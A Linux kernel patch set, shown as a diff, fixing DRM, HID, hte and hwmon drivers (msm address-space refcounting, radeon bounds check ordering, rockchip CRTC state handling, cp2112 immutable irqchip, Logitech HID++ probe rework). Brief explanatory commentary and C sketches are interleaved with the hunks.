++void msm_dsi_tx_buf_free(struct mipi_dsi_host *mipi_host);
+ int dsi_dma_base_get_6g(struct msm_dsi_host *msm_host, uint64_t *iova);
+ int dsi_dma_base_get_v2(struct msm_dsi_host *msm_host, uint64_t *iova);
+ int dsi_clk_init_v2(struct msm_dsi_host *msm_host);
+diff --git a/drivers/gpu/drm/msm/dsi/dsi_host.c b/drivers/gpu/drm/msm/dsi/dsi_host.c
+index e20cd3dd2c6cc..a7c6e8a1754de 100644
+--- a/drivers/gpu/drm/msm/dsi/dsi_host.c
++++ b/drivers/gpu/drm/msm/dsi/dsi_host.c
+@@ -149,6 +149,7 @@ struct msm_dsi_host {
+ 
+ 	/* DSI 6G TX buffer*/
+ 	struct drm_gem_object *tx_gem_obj;
++	struct msm_gem_address_space *aspace;
+ 
+ 	/* DSI v2 TX buffer */
+ 	void *tx_buf;
+@@ -1127,8 +1128,10 @@ int dsi_tx_buf_alloc_6g(struct msm_dsi_host *msm_host, int size)
+ 	uint64_t iova;
+ 	u8 *data;
+ 
++	msm_host->aspace = msm_gem_address_space_get(priv->kms->aspace);
++
+ 	data = msm_gem_kernel_new(dev, size, MSM_BO_WC,
+-					priv->kms->aspace,
++					msm_host->aspace,
+ 					&msm_host->tx_gem_obj, &iova);
+ 
+ 	if (IS_ERR(data)) {
+@@ -1157,10 +1160,10 @@ int dsi_tx_buf_alloc_v2(struct msm_dsi_host *msm_host, int size)
+ 	return 0;
+ }
+ 
+-static void dsi_tx_buf_free(struct msm_dsi_host *msm_host)
++void msm_dsi_tx_buf_free(struct mipi_dsi_host *host)
+ {
++	struct msm_dsi_host *msm_host = to_msm_dsi_host(host);
+ 	struct drm_device *dev = msm_host->dev;
+-	struct msm_drm_private *priv;
+ 
+ 	/*
+ 	 * This is possible if we're tearing down before we've had a chance to
+@@ -1171,11 +1174,11 @@ static void dsi_tx_buf_free(struct msm_dsi_host *msm_host)
+ 	if (!dev)
+ 		return;
+ 
+-	priv = dev->dev_private;
+ 	if (msm_host->tx_gem_obj) {
+-		msm_gem_unpin_iova(msm_host->tx_gem_obj, priv->kms->aspace);
+-		drm_gem_object_put(msm_host->tx_gem_obj);
++		msm_gem_kernel_put(msm_host->tx_gem_obj, msm_host->aspace);
++		msm_gem_address_space_put(msm_host->aspace);
+ 		msm_host->tx_gem_obj = NULL;
++		msm_host->aspace = NULL;
+ 	}
+ 
+ 	if (msm_host->tx_buf)
+@@ -2014,7 +2017,6 @@ void msm_dsi_host_destroy(struct mipi_dsi_host *host)
+ 	struct msm_dsi_host *msm_host = to_msm_dsi_host(host);
+ 
+ 	DBG("");
+-	dsi_tx_buf_free(msm_host);
+ 	if (msm_host->workqueue) {
+ 		destroy_workqueue(msm_host->workqueue);
+ 		msm_host->workqueue = NULL;
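
The msm change pins its own reference to the KMS address space when the TX buffer is allocated, and releases buffer and reference together in the new msm_dsi_tx_buf_free(), called from dsi_unbind() while the DRM device is still alive (msm_dsi_host_destroy() runs too late for this). Condensed, the pairing looks as below; this is a sketch reusing the helper and field names visible in the hunks, not the driver's full code:

/* Sketch of the alloc/free pairing above (msm internals assumed). */
static int tx_buf_alloc(struct msm_dsi_host *msm_host,
			struct msm_drm_private *priv, int size)
{
	uint64_t iova;
	u8 *data;

	/* pin the aspace so it cannot go away under the mapping */
	msm_host->aspace = msm_gem_address_space_get(priv->kms->aspace);

	data = msm_gem_kernel_new(msm_host->dev, size, MSM_BO_WC,
				  msm_host->aspace,
				  &msm_host->tx_gem_obj, &iova);
	return PTR_ERR_OR_ZERO(data);
}

static void tx_buf_free(struct msm_dsi_host *msm_host)
{
	if (!msm_host->tx_gem_obj)
		return;

	/* unpin and drop the BO, then drop our aspace reference */
	msm_gem_kernel_put(msm_host->tx_gem_obj, msm_host->aspace);
	msm_gem_address_space_put(msm_host->aspace);
	msm_host->tx_gem_obj = NULL;
	msm_host->aspace = NULL;
}
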
+diff --git a/drivers/gpu/drm/radeon/evergreen.c b/drivers/gpu/drm/radeon/evergreen.c
+index 4f06356d9ce2e..f0ae087be914e 100644
+--- a/drivers/gpu/drm/radeon/evergreen.c
++++ b/drivers/gpu/drm/radeon/evergreen.c
+@@ -4821,14 +4821,15 @@ restart_ih:
+ 			break;
+ 		case 44: /* hdmi */
+ 			afmt_idx = src_data;
+-			if (!(afmt_status[afmt_idx] & AFMT_AZ_FORMAT_WTRIG))
+-				DRM_DEBUG("IH: IH event w/o asserted irq bit?\n");
+-
+ 			if (afmt_idx > 5) {
+ 				DRM_ERROR("Unhandled interrupt: %d %d\n",
+ 					  src_id, src_data);
+ 				break;
+ 			}
++
++			if (!(afmt_status[afmt_idx] & AFMT_AZ_FORMAT_WTRIG))
++				DRM_DEBUG("IH: IH event w/o asserted irq bit?\n");
++
+ 			afmt_status[afmt_idx] &= ~AFMT_AZ_FORMAT_WTRIG;
+ 			queue_hdmi = true;
+ 			DRM_DEBUG("IH: HDMI%d\n", afmt_idx + 1);
+diff --git a/drivers/gpu/drm/rockchip/cdn-dp-core.c b/drivers/gpu/drm/rockchip/cdn-dp-core.c
+index 8526dda919317..0b33c3a1e6e3b 100644
+--- a/drivers/gpu/drm/rockchip/cdn-dp-core.c
++++ b/drivers/gpu/drm/rockchip/cdn-dp-core.c
+@@ -1178,6 +1178,7 @@ static int cdn_dp_probe(struct platform_device *pdev)
+ 	struct cdn_dp_device *dp;
+ 	struct extcon_dev *extcon;
+ 	struct phy *phy;
++	int ret;
+ 	int i;
+ 
+ 	dp = devm_kzalloc(dev, sizeof(*dp), GFP_KERNEL);
+@@ -1218,9 +1219,19 @@ static int cdn_dp_probe(struct platform_device *pdev)
+ 	mutex_init(&dp->lock);
+ 	dev_set_drvdata(dev, dp);
+ 
+-	cdn_dp_audio_codec_init(dp, dev);
++	ret = cdn_dp_audio_codec_init(dp, dev);
++	if (ret)
++		return ret;
++
++	ret = component_add(dev, &cdn_dp_component_ops);
++	if (ret)
++		goto err_audio_deinit;
+ 
+-	return component_add(dev, &cdn_dp_component_ops);
++	return 0;
++
++err_audio_deinit:
++	platform_device_unregister(dp->audio_pdev);
++	return ret;
+ }
+ 
+ static int cdn_dp_remove(struct platform_device *pdev)
+diff --git a/drivers/gpu/drm/rockchip/rockchip_drm_gem.c b/drivers/gpu/drm/rockchip/rockchip_drm_gem.c
+index 9426f7976d22e..10a4970ad2d8a 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_drm_gem.c
++++ b/drivers/gpu/drm/rockchip/rockchip_drm_gem.c
+@@ -39,7 +39,7 @@ static int rockchip_gem_iommu_map(struct rockchip_gem_object *rk_obj)
+ 
+ 	ret = iommu_map_sgtable(private->domain, rk_obj->dma_addr, rk_obj->sgt,
+ 				prot);
+-	if (ret < rk_obj->base.size) {
++	if (ret < (ssize_t)rk_obj->base.size) {
+ 		DRM_ERROR("failed to map buffer: size=%zd request_size=%zd\n",
+ 			  ret, rk_obj->base.size);
+ 		ret = -ENOMEM;
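
The rockchip one-liner is the classic signed/unsigned trap: iommu_map_sgtable() returns a signed value (bytes mapped, or a negative errno), and comparing it against an unsigned size_t converts a negative return into a huge unsigned number, so the `ret < size` error check could never fire. A runnable demonstration (compilers flag this with -Wsign-compare):

/* Demo of the signed/unsigned comparison pitfall fixed above. */
#include <stdio.h>
#include <sys/types.h>

int main(void)
{
	ssize_t ret = -12;	/* e.g. -ENOMEM from a mapping call */
	size_t size = 4096;

	/* ret is converted to size_t: (size_t)-12 is huge, result 0 */
	printf("unsigned compare: %d\n", ret < size);

	/* with the cast both sides are signed, result 1 as intended */
	printf("signed compare:   %d\n", ret < (ssize_t)size);
	return 0;
}
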
+diff --git a/drivers/gpu/drm/rockchip/rockchip_drm_vop.c b/drivers/gpu/drm/rockchip/rockchip_drm_vop.c
+index 2e2e08f4359a8..ae8c532f7fc84 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_drm_vop.c
++++ b/drivers/gpu/drm/rockchip/rockchip_drm_vop.c
+@@ -1606,7 +1606,8 @@ static struct drm_crtc_state *vop_crtc_duplicate_state(struct drm_crtc *crtc)
+ 	if (WARN_ON(!crtc->state))
+ 		return NULL;
+ 
+-	rockchip_state = kzalloc(sizeof(*rockchip_state), GFP_KERNEL);
++	rockchip_state = kmemdup(to_rockchip_crtc_state(crtc->state),
++				 sizeof(*rockchip_state), GFP_KERNEL);
+ 	if (!rockchip_state)
+ 		return NULL;
+ 
+@@ -1631,7 +1632,10 @@ static void vop_crtc_reset(struct drm_crtc *crtc)
+ 	if (crtc->state)
+ 		vop_crtc_destroy_state(crtc, crtc->state);
+ 
+-	__drm_atomic_helper_crtc_reset(crtc, &crtc_state->base);
++	if (crtc_state)
++		__drm_atomic_helper_crtc_reset(crtc, &crtc_state->base);
++	else
++		__drm_atomic_helper_crtc_reset(crtc, NULL);
+ }
+ 
+ #ifdef CONFIG_DRM_ANALOGIX_DP
+diff --git a/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c b/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
+index 3c05ce01f73b8..b233f52675dc4 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
++++ b/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
+@@ -2075,30 +2075,15 @@ static const struct drm_crtc_helper_funcs vop2_crtc_helper_funcs = {
+ 	.atomic_disable = vop2_crtc_atomic_disable,
+ };
+ 
+-static void vop2_crtc_reset(struct drm_crtc *crtc)
+-{
+-	struct rockchip_crtc_state *vcstate = to_rockchip_crtc_state(crtc->state);
+-
+-	if (crtc->state) {
+-		__drm_atomic_helper_crtc_destroy_state(crtc->state);
+-		kfree(vcstate);
+-	}
+-
+-	vcstate = kzalloc(sizeof(*vcstate), GFP_KERNEL);
+-	if (!vcstate)
+-		return;
+-
+-	crtc->state = &vcstate->base;
+-	crtc->state->crtc = crtc;
+-}
+-
+ static struct drm_crtc_state *vop2_crtc_duplicate_state(struct drm_crtc *crtc)
+ {
+-	struct rockchip_crtc_state *vcstate, *old_vcstate;
++	struct rockchip_crtc_state *vcstate;
+ 
+-	old_vcstate = to_rockchip_crtc_state(crtc->state);
++	if (WARN_ON(!crtc->state))
++		return NULL;
+ 
+-	vcstate = kmemdup(old_vcstate, sizeof(*old_vcstate), GFP_KERNEL);
++	vcstate = kmemdup(to_rockchip_crtc_state(crtc->state),
++			  sizeof(*vcstate), GFP_KERNEL);
+ 	if (!vcstate)
+ 		return NULL;
+ 
+@@ -2116,6 +2101,20 @@ static void vop2_crtc_destroy_state(struct drm_crtc *crtc,
+ 	kfree(vcstate);
+ }
+ 
++static void vop2_crtc_reset(struct drm_crtc *crtc)
++{
++	struct rockchip_crtc_state *vcstate =
++		kzalloc(sizeof(*vcstate), GFP_KERNEL);
++
++	if (crtc->state)
++		vop2_crtc_destroy_state(crtc, crtc->state);
++
++	if (vcstate)
++		__drm_atomic_helper_crtc_reset(crtc, &vcstate->base);
++	else
++		__drm_atomic_helper_crtc_reset(crtc, NULL);
++}
++
+ static const struct drm_crtc_funcs vop2_crtc_funcs = {
+ 	.set_config = drm_atomic_helper_set_config,
+ 	.page_flip = drm_atomic_helper_page_flip,
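
Both Rockchip VOP hunks converge on one pattern for subclassed CRTC state: duplicate with kmemdup() of the current state so driver-private fields are inherited, destroy through one helper, and reset through __drm_atomic_helper_crtc_reset(), which tolerates a NULL state on allocation failure instead of leaving crtc->state dangling. The pattern condensed (struct my_crtc_state and its field are illustrative):

/* Condensed sketch of the duplicate/destroy/reset pattern above. */
#include <linux/slab.h>
#include <drm/drm_atomic_state_helper.h>
#include <drm/drm_crtc.h>

struct my_crtc_state {
	struct drm_crtc_state base;
	int output_mode;	/* example driver-private field */
};

static inline struct my_crtc_state *to_my_state(struct drm_crtc_state *s)
{
	return container_of(s, struct my_crtc_state, base);
}

static void my_crtc_destroy_state(struct drm_crtc *crtc,
				  struct drm_crtc_state *state)
{
	__drm_atomic_helper_crtc_destroy_state(state);
	kfree(to_my_state(state));
}

static struct drm_crtc_state *my_crtc_duplicate_state(struct drm_crtc *crtc)
{
	struct my_crtc_state *s;

	if (WARN_ON(!crtc->state))
		return NULL;

	/* kmemdup() carries over every driver-private field */
	s = kmemdup(to_my_state(crtc->state), sizeof(*s), GFP_KERNEL);
	if (!s)
		return NULL;

	__drm_atomic_helper_crtc_duplicate_state(crtc, &s->base);
	return &s->base;
}

static void my_crtc_reset(struct drm_crtc *crtc)
{
	struct my_crtc_state *s = kzalloc(sizeof(*s), GFP_KERNEL);

	if (crtc->state)
		my_crtc_destroy_state(crtc, crtc->state);

	/* the helper copes with NULL if the allocation failed */
	__drm_atomic_helper_crtc_reset(crtc, s ? &s->base : NULL);
}
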
+diff --git a/drivers/gpu/host1x/context.c b/drivers/gpu/host1x/context.c
+index 047696432eb21..93c0c532fe5af 100644
+--- a/drivers/gpu/host1x/context.c
++++ b/drivers/gpu/host1x/context.c
+@@ -34,10 +34,10 @@ int host1x_memory_context_list_init(struct host1x *host1x)
+ 	if (err < 0)
+ 		return 0;
+ 
+-	cdl->devs = kcalloc(err, sizeof(*cdl->devs), GFP_KERNEL);
++	cdl->len = err / 4;
++	cdl->devs = kcalloc(cdl->len, sizeof(*cdl->devs), GFP_KERNEL);
+ 	if (!cdl->devs)
+ 		return -ENOMEM;
+-	cdl->len = err / 4;
+ 
+ 	for (i = 0; i < cdl->len; i++) {
+ 		struct iommu_fwspec *fwspec;
+diff --git a/drivers/hid/hid-cp2112.c b/drivers/hid/hid-cp2112.c
+index 27cadadda7c9d..2770d964133d5 100644
+--- a/drivers/hid/hid-cp2112.c
++++ b/drivers/hid/hid-cp2112.c
+@@ -163,7 +163,6 @@ struct cp2112_device {
+ 	atomic_t read_avail;
+ 	atomic_t xfer_avail;
+ 	struct gpio_chip gc;
+-	struct irq_chip irq;
+ 	u8 *in_out_buffer;
+ 	struct mutex lock;
+ 
+@@ -1080,16 +1079,20 @@ static void cp2112_gpio_irq_mask(struct irq_data *d)
+ {
+ 	struct gpio_chip *gc = irq_data_get_irq_chip_data(d);
+ 	struct cp2112_device *dev = gpiochip_get_data(gc);
++	irq_hw_number_t hwirq = irqd_to_hwirq(d);
+ 
+-	__clear_bit(d->hwirq, &dev->irq_mask);
++	__clear_bit(hwirq, &dev->irq_mask);
++	gpiochip_disable_irq(gc, hwirq);
+ }
+ 
+ static void cp2112_gpio_irq_unmask(struct irq_data *d)
+ {
+ 	struct gpio_chip *gc = irq_data_get_irq_chip_data(d);
+ 	struct cp2112_device *dev = gpiochip_get_data(gc);
++	irq_hw_number_t hwirq = irqd_to_hwirq(d);
+ 
+-	__set_bit(d->hwirq, &dev->irq_mask);
++	gpiochip_enable_irq(gc, hwirq);
++	__set_bit(hwirq, &dev->irq_mask);
+ }
+ 
+ static void cp2112_gpio_poll_callback(struct work_struct *work)
+@@ -1159,8 +1162,6 @@ static unsigned int cp2112_gpio_irq_startup(struct irq_data *d)
+ 	struct gpio_chip *gc = irq_data_get_irq_chip_data(d);
+ 	struct cp2112_device *dev = gpiochip_get_data(gc);
+ 
+-	INIT_DELAYED_WORK(&dev->gpio_poll_worker, cp2112_gpio_poll_callback);
+-
+ 	if (!dev->gpio_poll) {
+ 		dev->gpio_poll = true;
+ 		schedule_delayed_work(&dev->gpio_poll_worker, 0);
+@@ -1175,7 +1176,12 @@ static void cp2112_gpio_irq_shutdown(struct irq_data *d)
+ 	struct gpio_chip *gc = irq_data_get_irq_chip_data(d);
+ 	struct cp2112_device *dev = gpiochip_get_data(gc);
+ 
+-	cancel_delayed_work_sync(&dev->gpio_poll_worker);
++	cp2112_gpio_irq_mask(d);
++
++	if (!dev->irq_mask) {
++		dev->gpio_poll = false;
++		cancel_delayed_work_sync(&dev->gpio_poll_worker);
++	}
+ }
+ 
+ static int cp2112_gpio_irq_type(struct irq_data *d, unsigned int type)
+@@ -1228,6 +1234,18 @@ err_desc:
+ 	return ret;
+ }
+ 
++static const struct irq_chip cp2112_gpio_irqchip = {
++	.name = "cp2112-gpio",
++	.irq_startup = cp2112_gpio_irq_startup,
++	.irq_shutdown = cp2112_gpio_irq_shutdown,
++	.irq_ack = cp2112_gpio_irq_ack,
++	.irq_mask = cp2112_gpio_irq_mask,
++	.irq_unmask = cp2112_gpio_irq_unmask,
++	.irq_set_type = cp2112_gpio_irq_type,
++	.flags = IRQCHIP_MASK_ON_SUSPEND | IRQCHIP_IMMUTABLE,
++	GPIOCHIP_IRQ_RESOURCE_HELPERS,
++};
++
+ static int cp2112_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ {
+ 	struct cp2112_device *dev;
+@@ -1337,17 +1355,8 @@ static int cp2112_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 	dev->gc.can_sleep		= 1;
+ 	dev->gc.parent			= &hdev->dev;
+ 
+-	dev->irq.name = "cp2112-gpio";
+-	dev->irq.irq_startup = cp2112_gpio_irq_startup;
+-	dev->irq.irq_shutdown = cp2112_gpio_irq_shutdown;
+-	dev->irq.irq_ack = cp2112_gpio_irq_ack;
+-	dev->irq.irq_mask = cp2112_gpio_irq_mask;
+-	dev->irq.irq_unmask = cp2112_gpio_irq_unmask;
+-	dev->irq.irq_set_type = cp2112_gpio_irq_type;
+-	dev->irq.flags = IRQCHIP_MASK_ON_SUSPEND;
+-
+ 	girq = &dev->gc.irq;
+-	girq->chip = &dev->irq;
++	gpio_irq_chip_set_chip(girq, &cp2112_gpio_irqchip);
+ 	/* The event comes from the outside so no parent handler */
+ 	girq->parent_handler = NULL;
+ 	girq->num_parents = 0;
+@@ -1356,6 +1365,8 @@ static int cp2112_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 	girq->handler = handle_simple_irq;
+ 	girq->threaded = true;
+ 
++	INIT_DELAYED_WORK(&dev->gpio_poll_worker, cp2112_gpio_poll_callback);
++
+ 	ret = gpiochip_add_data(&dev->gc, dev);
+ 	if (ret < 0) {
+ 		hid_err(hdev, "error registering gpio chip\n");
+diff --git a/drivers/hid/hid-logitech-hidpp.c b/drivers/hid/hid-logitech-hidpp.c
+index 8d0dad12b2d37..fa1c7e07e220b 100644
+--- a/drivers/hid/hid-logitech-hidpp.c
++++ b/drivers/hid/hid-logitech-hidpp.c
+@@ -31,11 +31,6 @@ MODULE_LICENSE("GPL");
+ MODULE_AUTHOR("Benjamin Tissoires <benjamin.tissoires@gmail.com>");
+ MODULE_AUTHOR("Nestor Lopez Casado <nlopezcasad@logitech.com>");
+ 
+-static bool disable_raw_mode;
+-module_param(disable_raw_mode, bool, 0644);
+-MODULE_PARM_DESC(disable_raw_mode,
+-	"Disable Raw mode reporting for touchpads and keep firmware gestures.");
+-
+ static bool disable_tap_to_click;
+ module_param(disable_tap_to_click, bool, 0644);
+ MODULE_PARM_DESC(disable_tap_to_click,
+@@ -71,7 +66,7 @@ MODULE_PARM_DESC(disable_tap_to_click,
+ /* bits 2..20 are reserved for classes */
+ /* #define HIDPP_QUIRK_CONNECT_EVENTS		BIT(21) disabled */
+ #define HIDPP_QUIRK_WTP_PHYSICAL_BUTTONS	BIT(22)
+-#define HIDPP_QUIRK_NO_HIDINPUT			BIT(23)
++#define HIDPP_QUIRK_DELAYED_INIT		BIT(23)
+ #define HIDPP_QUIRK_FORCE_OUTPUT_REPORTS	BIT(24)
+ #define HIDPP_QUIRK_UNIFYING			BIT(25)
+ #define HIDPP_QUIRK_HIDPP_WHEELS		BIT(26)
+@@ -88,8 +83,6 @@ MODULE_PARM_DESC(disable_tap_to_click,
+ 					 HIDPP_CAPABILITY_HIDPP20_HI_RES_SCROLL | \
+ 					 HIDPP_CAPABILITY_HIDPP20_HI_RES_WHEEL)
+ 
+-#define HIDPP_QUIRK_DELAYED_INIT		HIDPP_QUIRK_NO_HIDINPUT
+-
+ #define HIDPP_CAPABILITY_HIDPP10_BATTERY	BIT(0)
+ #define HIDPP_CAPABILITY_HIDPP20_BATTERY	BIT(1)
+ #define HIDPP_CAPABILITY_BATTERY_MILEAGE	BIT(2)
+@@ -1764,15 +1757,14 @@ static int hidpp_battery_get_property(struct power_supply *psy,
+ /* -------------------------------------------------------------------------- */
+ #define HIDPP_PAGE_WIRELESS_DEVICE_STATUS			0x1d4b
+ 
+-static int hidpp_set_wireless_feature_index(struct hidpp_device *hidpp)
++static int hidpp_get_wireless_feature_index(struct hidpp_device *hidpp, u8 *feature_index)
+ {
+ 	u8 feature_type;
+ 	int ret;
+ 
+ 	ret = hidpp_root_get_feature(hidpp,
+ 				     HIDPP_PAGE_WIRELESS_DEVICE_STATUS,
+-				     &hidpp->wireless_feature_index,
+-				     &feature_type);
++				     feature_index, &feature_type);
+ 
+ 	return ret;
+ }
+@@ -4006,6 +3998,13 @@ static void hidpp_connect_event(struct hidpp_device *hidpp)
+ 		}
+ 	}
+ 
++	if (hidpp->protocol_major >= 2) {
++		u8 feature_index;
++
++		if (!hidpp_get_wireless_feature_index(hidpp, &feature_index))
++			hidpp->wireless_feature_index = feature_index;
++	}
++
+ 	if (hidpp->name == hdev->name && hidpp->protocol_major >= 2) {
+ 		name = hidpp_get_device_name(hidpp);
+ 		if (name) {
+@@ -4044,7 +4043,7 @@ static void hidpp_connect_event(struct hidpp_device *hidpp)
+ 	if (hidpp->capabilities & HIDPP_CAPABILITY_HI_RES_SCROLL)
+ 		hi_res_scroll_enable(hidpp);
+ 
+-	if (!(hidpp->quirks & HIDPP_QUIRK_NO_HIDINPUT) || hidpp->delayed_input)
++	if (!(hidpp->quirks & HIDPP_QUIRK_DELAYED_INIT) || hidpp->delayed_input)
+ 		/* if the input nodes are already created, we can stop now */
+ 		return;
+ 
+@@ -4149,7 +4148,6 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 	bool connected;
+ 	unsigned int connect_mask = HID_CONNECT_DEFAULT;
+ 	struct hidpp_ff_private_data data;
+-	bool will_restart = false;
+ 
+ 	/* report_fixup needs drvdata to be set before we call hid_parse */
+ 	hidpp = devm_kzalloc(&hdev->dev, sizeof(*hidpp), GFP_KERNEL);
+@@ -4190,11 +4188,6 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 	    hidpp_application_equals(hdev, HID_GD_KEYBOARD))
+ 		hidpp->quirks |= HIDPP_QUIRK_HIDPP_CONSUMER_VENDOR_KEYS;
+ 
+-	if (disable_raw_mode) {
+-		hidpp->quirks &= ~HIDPP_QUIRK_CLASS_WTP;
+-		hidpp->quirks &= ~HIDPP_QUIRK_NO_HIDINPUT;
+-	}
+-
+ 	if (hidpp->quirks & HIDPP_QUIRK_CLASS_WTP) {
+ 		ret = wtp_allocate(hdev, id);
+ 		if (ret)
+@@ -4205,10 +4198,6 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 			return ret;
+ 	}
+ 
+-	if (hidpp->quirks & HIDPP_QUIRK_DELAYED_INIT ||
+-	    hidpp->quirks & HIDPP_QUIRK_UNIFYING)
+-		will_restart = true;
+-
+ 	INIT_WORK(&hidpp->work, delayed_work_cb);
+ 	mutex_init(&hidpp->send_mutex);
+ 	init_waitqueue_head(&hidpp->wait);
+@@ -4220,10 +4209,12 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 			 hdev->name);
+ 
+ 	/*
+-	 * Plain USB connections need to actually call start and open
+-	 * on the transport driver to allow incoming data.
++	 * First call hid_hw_start(hdev, 0) to allow IO without connecting any
++	 * hid subdrivers (hid-input, hidraw). This allows retrieving the dev's
++	 * name and serial number and store these in hdev->name and hdev->uniq,
++	 * before the hid-input and hidraw drivers expose these to userspace.
+ 	 */
+-	ret = hid_hw_start(hdev, will_restart ? 0 : connect_mask);
++	ret = hid_hw_start(hdev, 0);
+ 	if (ret) {
+ 		hid_err(hdev, "hw start failed\n");
+ 		goto hid_hw_start_fail;
+@@ -4256,15 +4247,6 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 		hidpp_overwrite_name(hdev);
+ 	}
+ 
+-	if (connected && hidpp->protocol_major >= 2) {
+-		ret = hidpp_set_wireless_feature_index(hidpp);
+-		if (ret == -ENOENT)
+-			hidpp->wireless_feature_index = 0;
+-		else if (ret)
+-			goto hid_hw_init_fail;
+-		ret = 0;
+-	}
+-
+ 	if (connected && (hidpp->quirks & HIDPP_QUIRK_CLASS_WTP)) {
+ 		ret = wtp_get_config(hidpp);
+ 		if (ret)
+@@ -4278,21 +4260,14 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 	schedule_work(&hidpp->work);
+ 	flush_work(&hidpp->work);
+ 
+-	if (will_restart) {
+-		/* Reset the HID node state */
+-		hid_device_io_stop(hdev);
+-		hid_hw_close(hdev);
+-		hid_hw_stop(hdev);
++	if (hidpp->quirks & HIDPP_QUIRK_DELAYED_INIT)
++		connect_mask &= ~HID_CONNECT_HIDINPUT;
+ 
+-		if (hidpp->quirks & HIDPP_QUIRK_NO_HIDINPUT)
+-			connect_mask &= ~HID_CONNECT_HIDINPUT;
+-
+-		/* Now export the actual inputs and hidraw nodes to the world */
+-		ret = hid_hw_start(hdev, connect_mask);
+-		if (ret) {
+-			hid_err(hdev, "%s:hid_hw_start returned error\n", __func__);
+-			goto hid_hw_start_fail;
+-		}
++	/* Now export the actual inputs and hidraw nodes to the world */
++	ret = hid_connect(hdev, connect_mask);
++	if (ret) {
++		hid_err(hdev, "%s:hid_connect returned error %d\n", __func__, ret);
++		goto hid_hw_init_fail;
+ 	}
+ 
+ 	if (hidpp->quirks & HIDPP_QUIRK_CLASS_G920) {
+@@ -4303,6 +4278,11 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 				 ret);
+ 	}
+ 
++	/*
++	 * This relies on logi_dj_ll_close() being a no-op so that DJ connection
++	 * events will still be received.
++	 */
++	hid_hw_close(hdev);
+ 	return ret;
+ 
+ hid_hw_init_fail:
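
The hidpp rework replaces the start/stop/restart dance with a two-stage bring-up: hid_hw_start(hdev, 0) enables transport IO with no subdrivers connected, the driver interrogates the device (name, serial, wireless feature index), and a single hid_connect() then publishes the input and hidraw nodes, so userspace never sees them appear, vanish and reappear. The flow in condensed form; a sketch, not the driver's exact code:

/* Condensed two-stage HID bring-up as used above (sketch). */
#include <linux/hid.h>

static int my_hid_probe(struct hid_device *hdev,
			const struct hid_device_id *id)
{
	unsigned int connect_mask = HID_CONNECT_DEFAULT;
	int ret;

	ret = hid_parse(hdev);
	if (ret)
		return ret;

	/* stage 1: transport IO only, nothing visible to userspace */
	ret = hid_hw_start(hdev, 0);
	if (ret)
		return ret;

	ret = hid_hw_open(hdev);
	if (ret)
		goto stop;

	/* ... query the device, fill hdev->name / hdev->uniq ... */

	/* stage 2: now expose input and hidraw nodes */
	ret = hid_connect(hdev, connect_mask);
	if (ret)
		goto close;

	hid_hw_close(hdev);
	return 0;

close:
	hid_hw_close(hdev);
stop:
	hid_hw_stop(hdev);
	return ret;
}
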
+diff --git a/drivers/hte/hte-tegra194-test.c b/drivers/hte/hte-tegra194-test.c
+index ce8c44e792213..60f0ef2cb324f 100644
+--- a/drivers/hte/hte-tegra194-test.c
++++ b/drivers/hte/hte-tegra194-test.c
+@@ -154,8 +154,10 @@ static int tegra_hte_test_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	cnt = of_hte_req_count(hte.pdev);
+-	if (cnt < 0)
++	if (cnt < 0) {
++		ret = cnt;
+ 		goto free_irq;
++	}
+ 
+ 	dev_info(&pdev->dev, "Total requested lines:%d\n", cnt);
+ 
+diff --git a/drivers/hwmon/axi-fan-control.c b/drivers/hwmon/axi-fan-control.c
+index 6724e0dd30880..25abf28084c96 100644
+--- a/drivers/hwmon/axi-fan-control.c
++++ b/drivers/hwmon/axi-fan-control.c
+@@ -496,6 +496,21 @@ static int axi_fan_control_probe(struct platform_device *pdev)
+ 		return -ENODEV;
+ 	}
+ 
++	ret = axi_fan_control_init(ctl, pdev->dev.of_node);
++	if (ret) {
++		dev_err(&pdev->dev, "Failed to initialize device\n");
++		return ret;
++	}
++
++	ctl->hdev = devm_hwmon_device_register_with_info(&pdev->dev,
++							 name,
++							 ctl,
++							 &axi_chip_info,
++							 axi_fan_control_groups);
++
++	if (IS_ERR(ctl->hdev))
++		return PTR_ERR(ctl->hdev);
++
+ 	ctl->irq = platform_get_irq(pdev, 0);
+ 	if (ctl->irq < 0)
+ 		return ctl->irq;
+@@ -509,19 +524,7 @@ static int axi_fan_control_probe(struct platform_device *pdev)
+ 		return ret;
+ 	}
+ 
+-	ret = axi_fan_control_init(ctl, pdev->dev.of_node);
+-	if (ret) {
+-		dev_err(&pdev->dev, "Failed to initialize device\n");
+-		return ret;
+-	}
+-
+-	ctl->hdev = devm_hwmon_device_register_with_info(&pdev->dev,
+-							 name,
+-							 ctl,
+-							 &axi_chip_info,
+-							 axi_fan_control_groups);
+-
+-	return PTR_ERR_OR_ZERO(ctl->hdev);
++	return 0;
+ }
+ 
+ static struct platform_driver axi_fan_control_driver = {
+diff --git a/drivers/hwmon/coretemp.c b/drivers/hwmon/coretemp.c
+index baaf8af4cb443..09aab5859fa75 100644
+--- a/drivers/hwmon/coretemp.c
++++ b/drivers/hwmon/coretemp.c
+@@ -41,7 +41,7 @@ MODULE_PARM_DESC(tjmax, "TjMax value in degrees Celsius");
+ #define PKG_SYSFS_ATTR_NO	1	/* Sysfs attribute for package temp */
+ #define BASE_SYSFS_ATTR_NO	2	/* Sysfs Base attr no for coretemp */
+ #define NUM_REAL_CORES		128	/* Number of Real cores per cpu */
+-#define CORETEMP_NAME_LENGTH	19	/* String Length of attrs */
++#define CORETEMP_NAME_LENGTH	28	/* String Length of attrs */
+ #define MAX_CORE_ATTRS		4	/* Maximum no of basic attrs */
+ #define TOTAL_ATTRS		(MAX_CORE_ATTRS + 1)
